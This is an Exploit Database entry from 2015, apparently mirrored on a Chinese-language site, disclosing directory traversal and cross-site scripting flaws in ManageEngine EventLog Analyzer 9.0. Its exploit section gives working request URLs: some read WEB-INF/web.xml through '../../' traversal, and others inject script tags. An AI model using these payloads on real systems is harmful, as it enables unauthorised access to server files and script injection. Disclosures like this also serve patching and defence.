ManageEngine EventLog Analyzer 9.0 – Directory Traversal / Cross-Site Scripting

• Exploit Database
• 115 阅读

• 作者： Ertebat Gostar Co
  日期： 2015-01-26
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/35910/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58

  ################################################################################################ ## #...:::::ManageEngine EventLog Analyzer Directory Traversal/XSSVulnerabilities::::.... # # #############################################################################################     Sobhan System Network & Security Group (sobhansys) ------------------------------------------------------- # Date: 2015-01-24 # Exploit Author: AmirHadi Yazdani (Sobhansys Co) # Vendor Homepage: http://www.manageengine.com/products/eventlog/ # Demo Link: http://demo.eventloganalyzer.com/event/index3.do #Affected version: <= Build Version: 9.0   About ManageEngine EventLog Analyzer (From Vendor Site) : EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market. Using this Log Analyzer software, organizations can automate the entire process of managing terabytes of machine generated logs by collecting, analyzing, correlating, searching, reporting, and archiving from one central location. This event log analyzer software helps to monitor file integrity, conduct log forensics analysis, monitor privileged users and comply to different compliance regulatory bodies by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, historical trend reports, and more. --------------------------------------------------------   I&apos;M hadihadi From Virangar Security Team   special tnx to:MR.nosrati,black.shadowes,MR.hesy & all virangar members & all hackerz   greetz to My friends In Signal IT Group (www.signal-net.net) & A.Molaei   spl:Z.Khodaee   ------- exploit:   Diretory Traversal :   http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=../../WEB-INF/web.xml%3f http://127.0.0.1/event/index2.do?completeData=true&helpP=archiveAction&tab=system&url=../../WEB-INF/web.xml%3f http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13&tab=system&url=../../WEB-INF/web.xml%3f   XSS :   http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=userReport&apos;%22()%26%25<ahy><ScRiPt%20>prompt(915375)</ScRiPt> http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13&apos;%22()%26%25<ahy><ScRiPt%20>prompt(978138)</ScRiPt>&tab=system&url=ConfigureTemplate     ---- Sobhan system Co. Signal Network And Security Group (www.signal-net.net)   E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net